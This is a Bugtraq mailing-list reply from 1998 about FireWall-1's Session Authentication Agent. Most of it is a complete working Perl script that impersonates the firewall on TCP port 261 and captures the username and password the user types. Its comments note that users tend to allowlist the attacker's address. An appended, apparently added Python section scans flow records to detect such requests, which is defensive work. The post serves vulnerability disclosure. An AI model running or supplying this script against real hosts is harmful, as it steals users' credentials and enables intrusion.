Bugtraq mailing list archives

Re: Firewall-1 3.0b Session Agent


From: acd () WEIRDNESS NET (Andrew Danforth)
Date: Fri, 25 Sep 1998 18:24:58 -0400


On Fri, 25 Sep 1998, Brooke Paul wrote:

> -----Original Message-----
> From: Larry Pingree [SMTP:larryp () secure-it net]
>
> A problem exists in the Firewall-1 3.0b Session Agent
>
> All communications from the Firewall-1 Module to the session agent are
> non-encrypted. Thus also allowing these communications to be snooped for
> usernames and passwords.
>
>   I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported.  The real problem
> is the protocol they have defined.  Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.

Where is that stated?  I was unable to find any documentation stating that
the Authentication Agent is a demo.  I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...

Here's the script that Larry referred to.  I whipped it up during his FW-1
class, of all places... :)

---------- SNIP ----------
#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT.  It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests.  If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
#    "Authentication request from this IP Address is not allowed."
#                           [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
#    "Do you want to enter this IP to the Firewall-1 list"
#              [ YES ] (default)          [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <acd () weirdness net>

require 5.000;

use Socket;
use Getopt::Std;

$| = 1;

$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;

die unless getopts('n:p:');

unless ($TARGET_IP = shift) {
   print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
   exit(1);
}

$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);

socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";

select(SOCK); $| = 1; select(STDOUT);

print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";
print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";

sub get_response {
   # this is ugly but it works.  the session agent doesn't seem to send proper newlines.
   my $input;
   $input .= $key while($key = getc SOCK and ord($key));
   return $input;
}
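
Added example, not part of the original post or of any Check Point code: a defender-side check that scans flow records for connections to the Session Agent port (TCP 261, as used in the script above) and flags authentication requests from hosts that are not known firewall modules. The flow record layout, the module address and the sample records are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

AGENT_PORT = 261  # port the script above connects to
GREETING = b"220 FW-1 Session Authentication Request"
# Assumption: the site's real FireWall-1 module address (constructed value).
FIREWALL_MODULES = {ipaddress.ip_address("192.0.2.1")}
# Constructed flow records: (src, dst, dst port, first payload bytes).
SAMPLE_FLOWS = [
    ("192.0.2.1", "198.51.100.20", 261, GREETING + b" from Corporate Firewall\n\r"),
    ("198.51.100.77", "198.51.100.20", 261, GREETING + b" from Corporate Firewall\n\r"),
    ("198.51.100.77", "198.51.100.21", 261, b""),
    ("198.51.100.30", "203.0.113.5", 80, b"GET / HTTP/1.0\r\n"),
]

def classify(flow, modules=FIREWALL_MODULES):
    """Return None for unrelated traffic, else (severity, reason)."""
    src, _dst, dport, payload = flow
    if dport != AGENT_PORT:
        return None
    if ipaddress.ip_address(src) in modules:
        # Expected source, but the exchange still crosses the wire unencrypted.
        return ("info", "cleartext auth request from known module")
    if payload.startswith(GREETING):
        return ("high", "auth request from unlisted host")
    return ("medium", "connection to agent port from unlisted host")

def scan(flows, modules=FIREWALL_MODULES):
    """Return alerts (severity, src, dst, reason), most severe first."""
    rank = {"high": 0, "medium": 1, "info": 2}
    alerts = []
    for flow in flows:
        verdict = classify(flow, modules)
        if verdict:
            alerts.append((verdict[0], flow[0], flow[1], verdict[1]))
    return sorted(alerts, key=lambda a: rank[a[0]])

def sweepers(flows, modules=FIREWALL_MODULES, threshold=2):
    """Unlisted sources that contacted at least `threshold` distinct agents."""
    seen = defaultdict(set)
    for src, dst, dport, _payload in flows:
        if dport == AGENT_PORT and ipaddress.ip_address(src) not in modules:
            seen[src].add(dst)
    return {src: len(dsts) for src, dsts in seen.items() if len(dsts) >= threshold}

if __name__ == "__main__":
    for alert in scan(SAMPLE_FLOWS):
        print(*alert, sep="  ")
    print("sweepers:", sweepers(SAMPLE_FLOWS))
```

Because the agent itself only asks the user whether to add an unknown address, a network-side allowlist like this is the check that does not depend on which button gets clicked.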


